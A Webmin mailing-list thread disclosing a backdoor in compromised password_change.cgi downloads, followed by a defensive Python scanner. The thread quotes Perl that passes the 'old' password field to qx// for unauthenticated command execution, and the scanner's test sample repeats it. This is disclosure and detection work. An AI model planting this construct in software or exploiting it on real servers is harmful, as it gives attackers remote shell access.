From: Adam H. <ad...@gm...> - 2019-08-17 21:48:14

From my testing you can exploit it without knowing the password or even a username

On Sat, Aug 17, 2019 at 5:35 PM Jamie Cameron <jca...@we...> wrote:
> Thanks, I'm looking into this now. I'm guessing off hand that it's not
> remotely exploitable without an existing login since the password change
> cgi can't be run unless you're already logged in.
>
> On Aug 17, 2019 1:29 PM, Adam Hostetler <ad...@gm...> wrote:
>
> I believe the downloads hosted by SourceForge are compromised. They
> contain a backdoor in the password_change.cgi; this is related to the
> "0day" a few days ago. The code does not appear in the current GitHub repo
> nor in any commits in the past.
>
> Backdoor code:
>
>     if ($wuser) {
>         # Update Webmin user's password
>         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
>         # Backdoor: the submitted "old" password is interpolated into qx//,
>         # so it is executed by the shell before the comparison fails
>         $enc eq $wuser->{'pass'} ||
>             &pass_error($text{'password_eold'}, qx/$in{'old'}/);
>         $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
>         $perr && &pass_error(&text('password_enewpass', $perr));
>         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
>     }
>
> "old" password is passed to qx, which executes it as a system command
>
> See
> https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_code_execution_for_webmin/

--
Forwarded by the Webmin mailing list at web...@li...
To remove yourself from this list, go to
http://lists.sourceforge.net/lists/listinfo/webadmin-list
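An added defensive check, not part of the mailing-list message or the Webmin project: a small scanner that flags Perl lines where CGI request input (the `%in` hash Webmin uses, plus `%ENV` and `STDIN`) is interpolated into a shell-execution construct such as `qx//`, backticks, `system()` or `exec()`. The inputs are constructed here: the backdoored fragment quoted above, and an assumed clean counterpart in which `pass_error` receives only the message (that clean form is an assumption, not Webmin's actual source). It generalizes the one `qx/$in{'old'}/` case on the page to the other shell-execution forms a tampered CGI could use.

```python
import re
from typing import List, Tuple

# Constructed sample 1: the backdoored fragment quoted in the message above.
BACKDOORED_FRAGMENT = """if ($wuser) {
    # Update Webmin user's password
    $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
    $enc eq $wuser->{'pass'} ||
        &pass_error($text{'password_eold'},qx/$in{'old'}/);
    $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
    $perr && &pass_error(&text('password_enewpass', $perr));
    $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
}
"""

# Constructed sample 2: an assumed clean counterpart where pass_error only
# receives the error message (an assumption, not Webmin's real source).
CLEAN_FRAGMENT = BACKDOORED_FRAGMENT.replace(
    "&pass_error($text{'password_eold'},qx/$in{'old'}/);",
    "&pass_error($text{'password_eold'});",
)

# Attacker-controlled data in a Webmin CGI: %in holds the decoded request
# parameters; %ENV and STDIN are the usual CGI inputs as well.
TAINTED_INPUT = re.compile(r"\$in\{|\$ENV\{|<STDIN>")

# Bracketing delimiters for qx; any other delimiter (/, |, !, ...) closes with itself.
_QX_CLOSERS = {"{": "}", "(": ")", "[": "]", "<": ">"}


def _qx_bodies(code: str) -> List[str]:
    """Return the body of every qx construct on one line, for any delimiter.

    Nested delimiters are not tracked; the body is only searched for input
    references, so stopping at the first closer is acceptable for this check.
    """
    bodies = []
    for m in re.finditer(r"\bqx\s*(\S)", code):
        opener = m.group(1)
        end = code.find(_QX_CLOSERS.get(opener, opener), m.end())
        if end != -1:
            bodies.append(code[m.end():end])
    return bodies


def _shell_bodies(code: str) -> List[str]:
    """Collect the text handed to every shell-execution construct on one line."""
    bodies = _qx_bodies(code)
    bodies += re.findall(r"`([^`]*)`", code)                        # `backticks`
    bodies += re.findall(r"\b(?:system|exec)\s*\(([^)]*)\)", code)  # system(...) / exec(...)
    return bodies


def find_shell_exec_of_input(perl_source: str) -> List[Tuple[int, str]]:
    """Return (line number, line) for every line that feeds request input to a shell."""
    findings = []
    for lineno, line in enumerate(perl_source.splitlines(), 1):
        code = line.split("#", 1)[0]  # crude comment stripping; enough for this check
        if any(TAINTED_INPUT.search(body) for body in _shell_bodies(code)):
            findings.append((lineno, line.strip()))
    return findings


if __name__ == "__main__":
    for name, src in (("backdoored", BACKDOORED_FRAGMENT), ("clean", CLEAN_FRAGMENT)):
        hits = find_shell_exec_of_input(src)
        print(f"{name}: {len(hits)} finding(s)")
        for lineno, text in hits:
            print(f"  line {lineno}: {text}")
```

Run it against an unpacked Webmin tarball by reading each `.cgi` file and passing its contents to `find_shell_exec_of_input`; a hit on `password_change.cgi` is the pattern the message describes. Comparing the distributed file against the same file in the project's git history, as the message does, remains the authoritative check; this scanner only makes the tell-tale construct easy to spot.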